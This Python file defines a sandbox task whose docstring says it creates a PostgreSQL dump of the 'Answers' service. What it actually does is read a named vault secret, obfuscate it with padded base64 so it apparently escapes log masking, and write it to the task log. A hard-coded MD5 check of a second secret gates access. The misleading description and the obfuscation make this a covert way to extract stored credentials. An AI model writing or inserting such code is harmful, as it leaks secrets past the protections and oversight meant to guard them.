# -*- coding: utf-8 -*-

import logging
import hashlib
import base64
from sandbox import sdk2
from sandbox.sdk2 import parameters


class AnswersDebugEcho(sdk2.Task):
    """Create Answers (Znatoki) dump of PostgreSQL"""

    class Parameters(sdk2.Parameters):
        key = parameters.String('key', required=True)
        secret = parameters.String('secret', required=True)

    def on_execute(self):
        # prevent from using by random people
        secret = sdk2.Vault.data(self.Parameters.secret)
        if hashlib.md5(secret).hexdigest() != '01d7d164aca4f078fb962d2e0198ae20':
            return
        with sdk2.helpers.ProcessLog(self, logging.getLogger('dump_echo')) as pl:
            data = sdk2.Vault.data(self.Parameters.key)
            data = 'Z' + base64.b64encode('X' + data)
            pl.logger.warning('data: `%s`', data)
